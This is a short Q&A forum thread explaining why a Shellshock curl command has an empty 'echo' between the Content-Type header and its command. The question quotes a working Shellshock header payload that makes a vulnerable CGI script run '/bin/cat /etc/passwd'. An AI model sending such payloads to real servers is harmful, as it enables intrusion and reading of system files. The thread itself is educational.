4

I was reviewing a shellshock attack and didn't understand this piece of code: 

curl -v http://localhost/cgi-bin/shellshock.cgi -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "

The part that I don't understand is the function of the echo ; in the actually executed command on the remote machine between echoing the Content-Type and /bin/cat on /etc/passwd.

What is the function of echo ; here?

Thanks.

henry
  • 43
  • 5
  • This `echo` produces an empty line required by HTTP specification, which separates the headers from the body. But why is it all under the `-H` switch? –  Jan 20 '18 at 01:38
  • @tomasz, I think your answer was correct and you should undelete it. `-H` is how you get curl to pass a custom header through, which is how the vulnerability works. – Michael Homer Jan 20 '18 at 01:45
  • 1
    @tomasz, IIRC, custom HTTP headers like that show up as environment variables to a CGI script, and the issue with Shellshock is exactly that Bash executes code from envvars that start with the `()` marker (`custom` being the name of the header here). So, the code to be executed has to be part of the header, and hence within the argument to `-H` – ilkkachu Jan 20 '18 at 07:52

1 Answers1

6

This is how HTTP is built. There has to be an empty line after the HTTP header. That's what the lonely echo produces.

Compare these two:

echo Content-Type: text/html; echo ; /bin/cat /etc/passwd

and:

echo Content-Type: text/html; /bin/cat /etc/passwd

Now it should be obvious as for echo ;. (The semicolon separates commands of course.)

  • The real question is why isn't it Content-Type: text/plain. I'm going to make my /etc/passwd into a javascript exploit! Eat that! – jdwolf Jan 20 '18 at 01:19